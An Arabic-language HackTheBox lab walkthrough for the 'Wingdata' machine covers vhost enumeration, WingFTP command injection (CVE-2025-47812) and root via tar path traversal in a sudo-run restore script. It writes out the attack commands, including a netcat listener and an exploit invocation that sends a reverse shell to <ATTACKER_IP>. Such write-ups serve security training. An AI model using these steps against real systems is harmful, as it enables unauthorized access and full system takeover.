
جولة HackTheBox Wingdata التي تغطي حقن الأوامر في WingFTP CVE-2025-47812 للوصول الأولي وتصعيد الصلاحيات عبر sudo باستخدام اجتياز مسار tar للوصول إلى root.
المنصة: HackTheBox | نظام التشغيل: Linux
يكشف تعداد VHost عن خادم WingFTP. يمنح حقن الأوامر CVE-2025-47812 وصولاً أولياً. الوصول إلى root عبر نص برمجي Python لاستعادة النسخ الاحتياطي يعمل بـ sudo ويستخرج أرشيف tar مُصمَّم — اجتياز مسار tar يكتب ملفاً عشوائياً بصلاحيات root.
nmap -sC -sV wingdata.htb -Pn
22/tcp open ssh OpenSSH
80/tcp open http wingdata.htb main site
تمت إضافة wingdata.htb إلى /etc/hosts. أشار المنفذ 80 إلى نطاق يدل على الاستضافة الافتراضية.
ffuf -u http://wingdata.htb -H 'Host: FUZZ.wingdata.htb' \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
تم العثور على: ftp.wingdata.htb — واجهة الويب لخادم WingFTP.
CVE-2025-47812 هو ثغرة حقن أوامر في واجهة الويب لخادم WingFTP. تُسلِّم معلمة غير مُنقَّاة صدفة عكسية.
nc -lvnp 4444
python3 exploit_CVE-2025-47812.py --target http://ftp.wingdata.htb --lhost <ATTACKER_IP> --lport 4444
تم الحصول على صدفة. تم استرجاع علم المستخدم.
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/restore.py
يقبل /opt/restore.py أرشيف tar ويستخرجه بصلاحيات root. لا يقوم tar بتنقية المسارات — أرشيف مُصمَّم يحتوي على ../ في اسم الملف يكتب ملفات خارج دليل الاستخراج.
python3 craft_tar.py
sudo /usr/bin/python3 /opt/restore.py -b backup_888.tar
تم الحصول على صدفة root. علم root في /root/root.txt.
لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن صريح باختبارها.